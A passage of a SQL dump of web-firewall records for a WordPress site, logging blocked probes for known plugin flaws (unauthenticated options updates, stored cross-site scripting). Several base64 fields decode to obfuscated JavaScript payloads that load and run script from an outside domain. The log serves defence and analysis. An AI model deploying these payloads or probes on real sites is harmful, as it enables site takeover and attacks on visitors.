Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9zZWN1cml0eV9pcA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37987,1571334710.940162,1571334710.015800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37981,1571334676.388824,1571334675.452800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=import_csv',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3ZhbHVlXVsxXVswXQ==\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9jZC5wcml2YWN5bG9jYXRpb25mb3Jsb2MuY29tL3RyYWNrJnY3Jz48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(38001,1571334726.040706,1571334724.569400,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfc3NueGNjbG49U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9qMGFwYzAwOCovLDExNi8qKi8sMTE2LypfbHJ4aHNnankqLywxMTIvKl9lbDlzYW01eiovLDExNS8qX2xyeGhzZ2p5Ki8sNTgvKl9qMGFwYzAwOCovLDQ3LypfZWw5c2FtNXoqLyw0Ny8qX2owYXBjMDA4Ki8sOTkvKl9zc254Y2NsbiovLDEwMC8qX2xyeGhzZ2p5Ki8sNDYvKl9lbDlzYW01eiovLDExMi8qX3NzbnhjY2xuKi8sMTE0LypfbHJ4aHNnankqLywxMDUvKl9qMGFwYzAwOCovLDExOC8qX2owYXBjMDA4Ki8sOTcvKl9zc254Y2NsbiovLDk5LyoqLywxMjEvKl9scnhoc2dqeSovLDEwOC8qKi8sMTExLyoqLyw5OS8qX2owYXBjMDA4Ki8sOTcvKl9scnhoc2dqeSovLDExNi8qKi8sMTA1Lypfc3NueGNjbG4qLywxMTEvKl9lbDlzYW01eiovLDExMC8qX2owYXBjMDA4Ki8sMTAyLypfbHJ4aHNnankqLywxMTEvKl9zc254Y2NsbiovLDExNC8qX2VsOXNhbTV6Ki8sMTA4LypfajBhcGMwMDgqLywxMTEvKl9qMGFwYzAwOCovLDk5LyoqLyw0Ni8qKi8sOTkvKiovLDExMS8qKi8sMTA5Lypfc3NueGNjbG4qLyw0Ny8qX3NzbnhjY2xuKi8sMTE2LypfZWw5c2FtNXoqLyw5Ny8qKi8sMTEyLyoqLywxMTIvKl9zc254Y2NsbiovLDEwMS8qX2VsOXNhbTV6Ki8sMTE0LypfZWw5c2FtNXoqLyw0Ni8qX3NzbnhjY2xuKi8sMTA2LypfbHJ4aHNnankqLywxMTUvKl9scnhoc2dqeSovLDYzLypfc3NueGNjbG4qLywxMDkvKiovLDYxLyoqLywxMDkvKl9lbDlzYW01eiovKTt2YXIgX2VsOXNhbTV6ID0gX2xyeGhzZ2p5KF9zc254Y2Nsbik7aWYoX2VsOXNhbTV6Lmxlbmd0aCA+IDMpe182a2VzNmh5ayhfZWw5c2FtNXopO30gZnVuY3Rpb24gX2xyeGhzZ2p5KF9uYWxwemFscil7IHZhciBfajBhcGMwMDggPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfajBhcGMwMDgub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9uYWxwemFsciwgZmFsc2UgKTtfajBhcGMwMDguc2VuZCggbnVsbCApO3JldHVybiBfajBhcGMwMDgucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfNmtlczZoeWsoX3h4M2JxcWdpKXsgdmFyIF9qczBldWI0bSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgX3h4M2JxcWdpKycgcmV0dXJuIHgreTsnKTtfanMwZXViNG0oMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(38002,1571334753.426273,1571334752.216300,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37931,1571051005.100229,1571051003.739400,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LyoqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExMi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sMTAwLypfYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sMTEyLypfYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDEwNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sOTkvKiovLDEyMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LyoqLywxMDUvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTEwLypfYWFhYWFhYWFhYWFhYWEqLywxMDIvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qX2FhYWFhYWFhYWFhYWFhKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDk3LyoqLywxMTIvKiovLDExMi8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sNjMvKl9hYWFhYWFhYWFhYWFhYSovLDEwOS8qKi8sNjEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhKi8pO3ZhciBfYWFhYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfYWFhYWFhYWFhYWFhYWErJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c3R5bGU+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37971,1571333929.814910,1571333928.756100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfb21wN2FkZHVha3Q3bmNwOD1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX3hkZmYzbXAxeDJ6MG5ibnQqLywxMTYvKiovLDExNi8qX2VsNGRiNTk4b21sazQyYWIqLywxMTIvKl9hOXZqOHU4YzlubGI5YmZvKi8sMTE1LypfZWw0ZGI1OThvbWxrNDJhYiovLDU4LypfeGRmZjNtcDF4MnowbmJudCovLDQ3LypfYTl2ajh1OGM5bmxiOWJmbyovLDQ3LypfeGRmZjNtcDF4MnowbmJudCovLDk5Lypfb21wN2FkZHVha3Q3bmNwOCovLDEwMC8qX2VsNGRiNTk4b21sazQyYWIqLyw0Ni8qX2E5dmo4dThjOW5sYjliZm8qLywxMTIvKl9vbXA3YWRkdWFrdDduY3A4Ki8sMTE0LypfZWw0ZGI1OThvbWxrNDJhYiovLDEwNS8qX3hkZmYzbXAxeDJ6MG5ibnQqLywxMTgvKl94ZGZmM21wMXgyejBuYm50Ki8sOTcvKl9vbXA3YWRkdWFrdDduY3A4Ki8sOTkvKiovLDEyMS8qX2VsNGRiNTk4b21sazQyYWIqLywxMDgvKiovLDExMS8qKi8sOTkvKl94ZGZmM21wMXgyejBuYm50Ki8sOTcvKl9lbDRkYjU5OG9tbGs0MmFiKi8sMTE2LyoqLywxMDUvKl9vbXA3YWRkdWFrdDduY3A4Ki8sMTExLypfYTl2ajh1OGM5bmxiOWJmbyovLDExMC8qX3hkZmYzbXAxeDJ6MG5ibnQqLywxMDIvKl9lbDRkYjU5OG9tbGs0MmFiKi8sMTExLypfb21wN2FkZHVha3Q3bmNwOCovLDExNC8qX2E5dmo4dThjOW5sYjliZm8qLywxMDgvKl94ZGZmM21wMXgyejBuYm50Ki8sMTExLypfeGRmZjNtcDF4MnowbmJudCovLDk5LyoqLyw0Ni8qKi8sOTkvKiovLDExMS8qKi8sMTA5Lypfb21wN2FkZHVha3Q3bmNwOCovLDQ3Lypfb21wN2FkZHVha3Q3bmNwOCovLDExNi8qX2E5dmo4dThjOW5sYjliZm8qLyw5Ny8qKi8sMTEyLyoqLywxMTIvKl9vbXA3YWRkdWFrdDduY3A4Ki8sMTAxLypfYTl2ajh1OGM5bmxiOWJmbyovLDExNC8qX2E5dmo4dThjOW5sYjliZm8qLyw0Ni8qX29tcDdhZGR1YWt0N25jcDgqLywxMDYvKl9lbDRkYjU5OG9tbGs0MmFiKi8sMTE1LypfZWw0ZGI1OThvbWxrNDJhYiovLDYzLypfb21wN2FkZHVha3Q3bmNwOCovLDEwOS8qKi8sNjEvKiovLDEwOS8qX2E5dmo4dThjOW5sYjliZm8qLyk7dmFyIF9hOXZqOHU4YzlubGI5YmZvID0gX2VsNGRiNTk4b21sazQyYWIoX29tcDdhZGR1YWt0N25jcDgpO2lmKF9hOXZqOHU4YzlubGI5YmZvLmxlbmd0aCA+IDMpe18zcnpjd3RseDUxM3UwaTNyKF9hOXZqOHU4YzlubGI5YmZvKTt9IGZ1bmN0aW9uIF9lbDRkYjU5OG9tbGs0MmFiKF8xZzF4bzhkbGYwZGt1ZzE0KXsgdmFyIF94ZGZmM21wMXgyejBuYm50ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X3hkZmYzbXAxeDJ6MG5ibnQub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF8xZzF4bzhkbGYwZGt1ZzE0LCBmYWxzZSApO194ZGZmM21wMXgyejBuYm50LnNlbmQoIG51bGwgKTtyZXR1cm4gX3hkZmYzbXAxeDJ6MG5ibnQucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfM3J6Y3d0bHg1MTN1MGkzcihfOGVuOWt6Zjc5dzgwd3MwZyl7IHZhciBfMmdtbnQ2MWR0MzhkYzdqZiA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgXzhlbjlremY3OXc4MHdzMGcrJyByZXR1cm4geCt5OycpO18yZ21udDYxZHQzOGRjN2pmKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37932,1571050996.548005,1571050995.523100,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LyoqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExMi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sMTAwLypfYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sMTEyLypfYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDEwNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sOTkvKiovLDEyMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LyoqLywxMDUvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTEwLypfYWFhYWFhYWFhYWFhYWEqLywxMDIvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qX2FhYWFhYWFhYWFhYWFhKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDk3LyoqLywxMTIvKiovLDExMi8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sNjMvKl9hYWFhYWFhYWFhYWFhYSovLDEwOS8qKi8sNjEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhKi8pO3ZhciBfYWFhYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfYWFhYWFhYWFhYWFhYWErJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c3R5bGU+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37973,1571333986.080907,1571333985.005300,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-settings',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9nZW5lcmFs\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37972,1571333960.741902,1571333959.819000,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37935,1571050984.664299,1571050983.666400,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37934,1571050988.640996,1571050985.889300,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37974,1571333984.273653,1571333982.641600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-security-settings-page',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9zZWN1cml0eV9pcA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37933,1571050994.268100,1571050993.361800,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37976,1571334024.345416,1571334023.411600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37988,1571334705.470941,1571334704.619900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37989,1571334703.943483,1571334702.821100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options 